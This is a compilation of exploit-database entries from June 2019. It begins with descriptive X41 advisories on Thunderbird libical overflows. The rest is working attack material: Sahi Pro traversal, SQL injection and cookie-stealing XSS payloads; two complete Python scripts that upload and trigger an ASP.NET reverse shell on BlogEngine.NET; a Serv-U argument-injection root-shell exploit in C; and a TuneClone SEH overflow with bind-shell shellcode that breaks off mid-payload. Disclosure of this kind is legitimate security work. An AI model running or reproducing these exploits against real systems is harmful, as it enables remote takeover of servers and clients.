-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2019-004 Type confusion in Thunderbird ============================= Severity Rating: Medium Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1555646 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11706 CWE: 843 CVSS Score: 6.5 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-004-thunderbird Summary and Impact ================== A type confusion has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash the process or leak information from the client system via calendar replies. X41 did not perform a full test or audit on the software. Product Description =================== Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis ======== A type confusion in icalproperty.c icaltimezone_get_vtimezone_properties() can be triggered while parsing a malformed calendar attachment. Missing sanity checks allows a TZID property to be parsed as ICALFLOATVALUE but it is later used as a string. The bug manifests with strdup(tzid); being called with tzid containing a bad pointer obtained by casting to char* from a float value, which typically means segfaulting by dereferencing a non-mapped memory page. An attacker might be able to deliver an input file containing specially crafted float values as TZID properties which could point to arbitrary memory positions. Certain conditions could allow to exfiltrate information via a calendar reply or other undetermined impact. Proof of Concept ================ A reproducer eml file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-004 Workarounds =========== A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline ======== 2019-05-30 Issues reported to the vendor 2019-06-07 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH ==================== X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtO0ACgkQo5Klpg50 CxCkuA/+L513gnHCf0hOFGuFsGaEX6dPSmJi1g2Wom28cXJw7dEd6/qU4k5H64cI yRDQR7vVt7+xUTlPIh8sguaPjB7xOlw+3pHpLo5+pfIuUuK/gK4Wm8ZF1Qv4okBs e046d2Nd+UAX/WbEXLt4UHOowgVEJWHfq54WkKHNTseWpeww/sBNdv1qlliiUCWa qnFMzA7rbgtOJl/LxS9xDOp5PufD3inR/Apvh49P8IhDj6L7+02fxGt0WdwA/8vF TiI2V4bHEYrLmsUptSHSj10HKfMlEqKgWWQCunTGvUZvWWYHS6cS6a9EbHuWWyNY 8BNj045D0Gw0xL1697erebeIxOZ33+QdEp1NopVzpJkeZBZtx/XYPY3PnQ+HMRjr 4LwsjdDBeaMVgiUIZ2EZ08779MBYPNB+6p0byaWgyTbyHk0GRVxqRNwkU/8xS0f4 M9NUt75T7FjqU8VX/KyZsmXs+/8tauh0T3J9CYoQ73r/WoRxB0xeJCEJueRegctu gSnIf+KApkmE+2WRc8CrPSZx42XhTjcoEgbcYSxGebEitd+bGz2j2gjwqxDGC8nr QK30hr/lOaC0y6nblfCygx+G6hZH1dc2+fi6ZboWZRqRTtB2zIM+SulMj+QjtHCm UMPFQeB8stxBfIAxLu8DojBq4YWP8N2wQ5MyAW3/TzTd+JO1Wbk= =Hy9J -----END PGP SIGNATURE----- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47001.zip

X41 D-Sec GmbH Security Advisory: X41-2019-001 Heap-based buffer overflow in Thunderbird ========================================= Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11704 CWE: 122 CVSS Score: 7.8 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-001-thunderbird Summary and Impact ================== A heap-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash or gain remote code execution in the client system. This issue was initially reported by Brandon Perry here: https://bugzilla.mozilla.org/show_bug.cgi?id=1280832 and fixed in libical upstream, but was never fixed in Thunderbird. X41 did not perform a full test or audit on the software. Product Description =================== Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis ======== A heap-based buffer overflow in icalvalue.c icalmemory_strdup_and_dequote() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string. {% highlight c %} static char *icalmemorystrdupanddequote(const char *str) { char *out = (char *)malloc(sizeof(char) * strlen(str) + 1); char *pout = out; // ... for (p = str; *p!=0; p++){ if( *p == '\') { p++; // ... else { *pout = *p; } } {% endhighlight %} Bounds checking in `icalmemorystrdupanddequote()can be bypassed when the inputp` ends with a backslash, which enables an attacker to read out of bounds of the input buffer and writing out of bounds of a heap-allocated output buffer. The issue manifests in several ways, including out of bounds read and write, null-pointer dereference and frequently leads to heap corruption. It is expected that an attacker can exploit this vulnerability to achieve remote code execution. Proof of Concept ================ A reproducer eml file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-001 Workarounds =========== A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline ======== 2016-06-19 Issue reported by Brandon Perry to the vendor 2019-05-23 Issue reported by X41 D-SEC to the vendor 2019-05-23 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH ==================== X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47002.zip

X41 D-Sec GmbH Security Advisory: X41-2019-002 Heap-based buffer overflow in Thunderbird ========================================= Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553820 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11703 CWE: 122 CVSS Score: 7.8 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird Summary and Impact ================== A heap-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash or gain remote code execution in the client system. This issue was initially reported by Brandon Perry here: https://bugzilla.mozilla.org/show_bug.cgi?id=1281041 and fixed in libical upstream, but was never fixed in Thunderbird. X41 did not perform a full test or audit on the software. Product Description =================== Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis ======== A heap-based buffer overflow in icalparser.c parser_get_next_char() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string. The issue initially manifests with out of bounds read, but we don't discard it could later lead to out of bounds write. It is expected that an attacker can exploit this vulnerability to achieve remote code execution. Proof of Concept ================ A reproducer ical file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-002 Workarounds =========== A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline ======== 2016-06-20 Issue reported by Brandon Perry to the vendor 2019-05-23 Issues reported to the vendor 2019-05-23 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH ==================== X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47003.zip

X41 D-Sec GmbH Security Advisory: X41-2019-003 Stack-based buffer overflow in Thunderbird ========================================== Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553808 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11705 CWE: 121 CVSS Score: 7.8 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-003-thunderbird Summary and Impact ================== A stack-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash or gain remote code execution in the client system. X41 did not perform a full test or audit on the software. Product Description =================== Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis ======== A stack-based buffer overflow in icalrecur.c icalrecur_add_bydayrules() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string. {% highlight c %} static int icalrecuraddbydayrules(struct icalrecurparser *parser, const char *vals) { short *array = parser->rt.byday; // ... while (n != 0) { // ... if (wd != ICALNOWEEKDAY) { array[i++] = (short) (sign * (wd + 8 * weekno)); array[i] = ICALRECURRENCEARRAYMAX; } } {% endhighlight %} Missing sanity checks in `icalrecuradd_bydayrules()can lead to out of bounds write in aarraywhenweekno` takes an invalid value. The issue manifests as an out-of-bounds write in a stack allocated buffer overflow. It is expected that an attacker can exploit this vulnerability to achieve remote code execution when proper stack smashing mitigations are missing. Proof of Concept ================ A reproducer eml file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-003 Workarounds =========== A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline ======== 2019-05-23 Issues reported to the vendor 2019-05-23 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH ==================== X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47004.zip

# Exploit Title: Sahi pro ( <= 8.x ) Directory traversal # Date: 17-06-2019 # Exploit Author: Goutham Madhwaraj ( https://barriersec.com ) # Vendor Homepage: https://sahipro.com/ # Software Link: https://sahipro.com/downloads-archive/ # Version: 7.x , <= 8.x # Tested on: Windows 10 # CVE : CVE-2018-20470 Description : An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files. POC : vulnerable URL : ''' replace the ip and port of the remote sahi pro server machine ''' http://<ip>:<port>/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected

# Exploit Title: Sahi pro ( <= 8.x ) sensitive information disclosure by SQL injection. # Date: 17-06-2019 # Exploit Author: Goutham Madhwaraj ( https://barriersec.com ) # Vendor Homepage: https://sahipro.com/ # Software Link: https://sahipro.com/downloads-archive/ # Version: 7.x , <= 8.x # Tested on: Windows 10 # CVE : CVE-2018-20469 # POC-URL : https://barriersec.com/2019/06/cve-2018-20469-sahi-pro/ Description : An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A parameter in the web reports module is vulnerable to SQL injection. This can be exploited to inject SQL queries and run standard h2 system functions. POC : vulnerable URL : ''' replace the ip and port of the remote sahi pro server machine ''' # here sql query is passed directly as part of GET request which can be modified to run standard h2 database functions. in the following POC , "memory_used()" function is injected , which is reflected in "status" column of reports page. http://<ip>:<port>/_s_/dyn/pro/DBReports?sql=SELECT DISTINCT memory_used() AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS.* FROM SUITEREPORTS,SCRIPTREPORTS

# Exploit Title: Sahi pro ( <= 8.x ) Stored XSS # Date: 17-06-2019 # Exploit Author: Goutham Madhwaraj ( https://barriersec.com ) # Vendor Homepage: https://sahipro.com/ # Software Link: https://sahipro.com/downloads-archive/ # Version: 7.x , <= 8.x # Tested on: Windows 10 # CVE : CVE-2018-20472 # POC-URL : https://barriersec.com/2019/06/cve-2018-20472-sahi-pro/ DESCRIPTION : An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. The logs web interface is vulnerable to stored XSS. Description parameter of Testcase API can be used to exploit the stored XSS. POC : step 1 : create a sahi test automation script with the following content and save the file with ".sah" extension ( example : poc.sah) : var $tc1 = _testcase(“TC-1″,”<script>alert(document.cookie)</script>”).start(); _log(“testing stored XSS injection”); $tc1.end(); Step 2 : Execute the created script ( poc.sah ) using sahi GUI controller . Step 3 : navigate to the web logs console ( http://<ip>:<port>/logs ) using the browser for the executed script. XSS is triggered .

# Exploit Title: Directory Traversal + RCE on BlogEngine.NET # Date: 17 Jun 2019 # Exploit Author: Aaron Bishop # Vendor Homepage: https://blogengine.io/ # Version: v3.3.7 # Tested on: 3.3.7, 3.3.6 # CVE : 2019-10720 #1. Description #============== #BlogEngine.NET is vulnerable to a Directory Traversal through the **theme** cookie which triggers a RCE. #2. Proof of Concept #============= #Using an account that has permissions to Edit Posts, upload a malicious file called `PostView.ascx`: #~~~ #POST /api/upload?action=filemgr HTTP/1.1 #Host: $RHOST #User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 #Accept: text/plain #Accept-Language: en-US,en;q=0.5 #Accept-Encoding: gzip, deflate #Cookie: XXX #Connection: close #Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063 #Content-Length: 2085 #-----------------------------12143974373743678091868871063 #Content-Disposition: form-data; filename="PostView.ascx" #<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %> #<%@ Import Namespace="BlogEngine.Core" %> #<script runat="server"> #static System.IO.StreamWriter streamWriter; # protected override void OnLoad(EventArgs e) { # base.OnLoad(e); #using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", 4445)) { #using(System.IO.Stream stream = client.GetStream()) { #using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) { #streamWriter = new System.IO.StreamWriter(stream); #StringBuilder strInput = new StringBuilder(); #System.Diagnostics.Process p = new System.Diagnostics.Process(); #p.StartInfo.FileName = "cmd.exe"; #p.StartInfo.CreateNoWindow = true; #p.StartInfo.UseShellExecute = false; #p.StartInfo.RedirectStandardOutput = true; #p.StartInfo.RedirectStandardInput = true; #p.StartInfo.RedirectStandardError = true; #p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler); #p.Start(); #p.BeginOutputReadLine(); #while(true) { #strInput.Append(rdr.ReadLine()); #p.StandardInput.WriteLine(strInput); #strInput.Remove(0, strInput.Length); # } } } } } # private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) { # StringBuilder strOutput = new StringBuilder(); # if (!String.IsNullOrEmpty(outLine.Data)) { # try { # strOutput.Append(outLine.Data); # streamWriter.WriteLine(strOutput); # streamWriter.Flush(); #} catch (Exception err) { } # } # } #</script> #<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder> #-----------------------------12143974373743678091868871063-- #~~~ #Trigger the RCE by setting the **theme** cookie to **../../App_Data/files/2019/06/** and browsing to any page on the application; authentication is not required to trigger the RCE. ================================= import argparse import io import json import os import re import requests import sys """ Exploit for CVE-2019-10719 CVE Identified by: Aaron Bishop Exploit written by: Aaron Bishop Upload and trigger a reverse shell python exploit.py -t 192.168.10.9 -l 192.168.10.10:1337 Open a listener to capture the reverse shell - Metasploit or netcat nc -nlvp 1337 listening on [any] 1337 ... connect to [192.168.10.10] from (UNKNOWN) [192.168.10.9] 49680 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. """ urls = { "login": "/Account/login.aspx", "traversal": "/api/filemanager" } def make_request(session, method, target, params={}, data={}, files={}): proxies = { "http": "127.0.0.1:8080", "https": "127.0.0.1:8080" } if method == 'GET': r = requests.Request(method, target, params=params) elif method == 'POST': if files: r = requests.Request(method, target, files=files) else: r = requests.Request(method, target, data=data) prep = session.prepare_request(r) resp = session.send(prep, verify=False, proxies=proxies) return resp.text def login(session, host, user, passwd): resp = make_request(session, 'GET', host+urls.get('login')) login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp) login_data = dict([(i[0],i[2]) for i in login_form]) login_data.update({'ctl00$MainContent$LoginUser$UserName': user}) login_data.update({'ctl00$MainContent$LoginUser$Password': passwd}) resp = make_request(session, 'POST', host+urls.get('login'), data=login_data) def upload_shell(session, target, listener): try: lhost, lport = listener.split(':') except: print(target, " is not in the correct HOST:PORT format") sys.exit(1) shell = '''<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %> <%@ Import Namespace="BlogEngine.Core" %> <script runat="server"> static System.IO.StreamWriter streamWriter; protected override void OnLoad(EventArgs e) { base.OnLoad(e); using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("''' + lhost + '''", ''' + lport + ''')) { using(System.IO.Stream stream = client.GetStream()) { using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) { streamWriter = new System.IO.StreamWriter(stream); StringBuilder strInput = new StringBuilder(); System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); while(true) { strInput.Append(rdr.ReadLine()); p.StandardInput.WriteLine(strInput); strInput.Remove(0, strInput.Length); } } } } } private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Data)) { try { strOutput.Append(outLine.Data); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } </script> <asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder> ''' make_request(session, "POST", target + "/api/upload?action=filemgr", files={"file": ("PostView.ascx", shell, "application/octet-stream")}) def trigger_shell(session, target): import datetime now = datetime.datetime.now().strftime("%Y/%m/") requests.get(target + "/", cookies={"theme": "../../App_Data/files/{}".format(now)}) def main(target, user, passwd, listener): with requests.Session() as session: login(session, target, user, passwd) upload_shell(session, target, listener) trigger_shell(session, target) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Exploit CVE-2019-10720 Path traversal + RCE') parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host') parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account with file upload permissions on blog') parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account') parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL") parser.add_argument('-l', '--listener', action="store", help="Host:Port combination reverse shell should back to - 192.168.10.10:1337") args = parser.parse_args() protocol = "https://" if args.ssl else "http://" main(protocol + args.target, args.user, args.passwd, args.listener)

/* CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation vulnerability found by: Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev to compile and run: gcc servu-pe-cve-2019-12181.c -o pe && ./pe */ #include <stdio.h> #include <unistd.h> #include <errno.h> int main() { char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL}; int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args); // if execv is successful, we won't reach here printf("ret val: %d errno: %d\n", ret_val, errno); return errno; }

# Exploit Title: Directory Traversal + RCE on BlogEngine.NET # Date: 17 Jun 2019 # Exploit Author: Aaron Bishop # Vendor Homepage: https://blogengine.io/ # Version: v3.3.7 # Tested on: 3.3.7, 3.3.6 # CVE : 2019-10719 #1. Description #============== #BlogEngine.NET is vulnerable to an Directory Traversal on `/api/upload` which allows a RCE through the `theme` parameter. #2. Proof of Concept #============= #Using an account that has permissions to Edit Posts, upload a malicious file called `PostView.ascx`; exploit the directory traversal to upload the shell into the **/Custom/Themes** #directory: #~~~ #POST /api/upload?action=filemgr&dirPath=%2f..%2f..%2fCustom%2fThemes%2fRCE_Test HTTP/1.1 #Host: $RHOST #User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 #Accept: text/plain #Accept-Language: en-US,en;q=0.5 #Accept-Encoding: gzip, deflate #Cookie: XXX #Connection: close #Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063 #Content-Length: 2085 #-----------------------------12143974373743678091868871063 #Content-Disposition: form-data; filename="PostView.ascx" #<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %> #<%@ Import Namespace="BlogEngine.Core" %> #<script runat="server"> #static System.IO.StreamWriter streamWriter; # protected override void OnLoad(EventArgs e) { # base.OnLoad(e); #using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", 4445)) { #using(System.IO.Stream stream = client.GetStream()) { #using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) { #streamWriter = new System.IO.StreamWriter(stream); #StringBuilder strInput = new StringBuilder(); #System.Diagnostics.Process p = new System.Diagnostics.Process(); #p.StartInfo.FileName = "cmd.exe"; #p.StartInfo.CreateNoWindow = true; #p.StartInfo.UseShellExecute = false; #p.StartInfo.RedirectStandardOutput = true; #p.StartInfo.RedirectStandardInput = true; #p.StartInfo.RedirectStandardError = true; #p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler); #p.Start(); #p.BeginOutputReadLine(); #while(true) { #strInput.Append(rdr.ReadLine()); #p.StandardInput.WriteLine(strInput); #strInput.Remove(0, strInput.Length); # } } } } } # private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) { # StringBuilder strOutput = new StringBuilder(); # if (!String.IsNullOrEmpty(outLine.Data)) { # try { # strOutput.Append(outLine.Data); # streamWriter.WriteLine(strOutput); # streamWriter.Flush(); #} catch (Exception err) { } # } # } #</script> #<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder> #-----------------------------12143974373743678091868871063-- #~~~ #The RCE can be triggered by setting the **theme** parameter to **RCE_TEST**: $RHOST/?theme=RCE_Test #============================== import argparse import io import json import os import re import requests import sys """ Exploit for CVE-2019-10719 CVE Identified by: Aaron Bishop Exploit written by: Aaron Bishop Upload and trigger a reverse shell python exploit.py -t 192.168.10.9 -l 192.168.10.10:1337 Open a listener to capture the reverse shell - Metasploit or netcat nc -nlvp 1337 listening on [any] 1337 ... connect to [192.168.10.10] from (UNKNOWN) [192.168.10.9] 49680 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. """ urls = { "login": "/Account/login.aspx", "traversal": "/api/filemanager" } def make_request(session, method, target, params={}, data={}, files={}): proxies = { "http": "127.0.0.1:8080", "https": "127.0.0.1:8080" } if method == 'GET': r = requests.Request(method, target, params=params) elif method == 'POST': if files: r = requests.Request(method, target, files=files) else: r = requests.Request(method, target, data=data) prep = session.prepare_request(r) resp = session.send(prep, verify=False, proxies=proxies) return resp.text def login(session, host, user, passwd): resp = make_request(session, 'GET', host+urls.get('login')) login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp) login_data = dict([(i[0],i[2]) for i in login_form]) login_data.update({'ctl00$MainContent$LoginUser$UserName': user}) login_data.update({'ctl00$MainContent$LoginUser$Password': passwd}) resp = make_request(session, 'POST', host+urls.get('login'), data=login_data) def upload_shell(session, target, shell_dir, listener): try: lhost, lport = listener.split(':') except: print(target, " is not in the correct HOST:PORT format") sys.exit(1) shell = '''<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %> <%@ Import Namespace="BlogEngine.Core" %> <script runat="server"> static System.IO.StreamWriter streamWriter; protected override void OnLoad(EventArgs e) { base.OnLoad(e); using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("''' + lhost + '''", ''' + lport + ''')) { using(System.IO.Stream stream = client.GetStream()) { using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) { streamWriter = new System.IO.StreamWriter(stream); StringBuilder strInput = new StringBuilder(); System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); while(true) { strInput.Append(rdr.ReadLine()); p.StandardInput.WriteLine(strInput); strInput.Remove(0, strInput.Length); } } } } } private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Data)) { try { strOutput.Append(outLine.Data); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } </script> <asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder> ''' make_request(session, "POST", target + "/api/upload?action=filemgr&dirPath=~/App_Data/files/../../Custom/Themes/" + shell_dir, files={"file": ("PostView.ascx".format(shell_dir=shell_dir), shell, "application/octet-stream")}) def trigger_shell(session, target, shell_dir): make_request(session, "GET", target + "/", params={"theme": shell_dir}) def main(target, user, passwd, shell_dir, listener): with requests.Session() as session: login(session, target, user, passwd) upload_shell(session, target, shell_dir, listener) trigger_shell(session, target, shell_dir) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Exploit CVE-2019-10719 Path traversal + RCE') parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host') parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account with file upload permissions on blog') parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account') parser.add_argument('-d', '--dir', nargs='?', default="RCE", help='Theme Directory to write Reverse shell too') parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL") parser.add_argument('-l', '--listener', action="store", help="Host:Port combination reverse shell should back to - 192.168.10.10:1337") args = parser.parse_args() protocol = "https://" if args.ssl else "http://" main(protocol + args.target, args.user, args.passwd, args.dir, args.listener)

# Exploit Title: TuneClone Local Seh Exploit # Date: 19.06.2019 # Vendor Homepage: http://www.tuneclone.com/ # Software Link: http://www.tuneclone.com/tuneclone_setup.exe # Exploit Author: Achilles # Tested Version: 2.20 # Tested on: Windows XP SP3 EN # 1.- Run python code : TuneClone.py # 2.- Open EVIL.txt and copy content to Clipboard # 3.- Open TuneClone and press Help and 'Enter License Code' # 4.- Paste the Content of EVIL.txt into the 'Name and Code Field' # 5.- Click 'OK' and you will have a bind shell port 3110. # 6.- Greetings go:XiDreamzzXi,Metatron #!/usr/bin/env python import struct buffer = "\x41" * 1056 nseh = "\xeb\x06\x90\x90" #jmp short 6 seh = struct.pack('<L',0x583411c0) #msaud32.acm nops = "\x90" * 20 #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python #badchars "\x00\x0a\x0d" shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b" "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8" "\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b" "\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07" 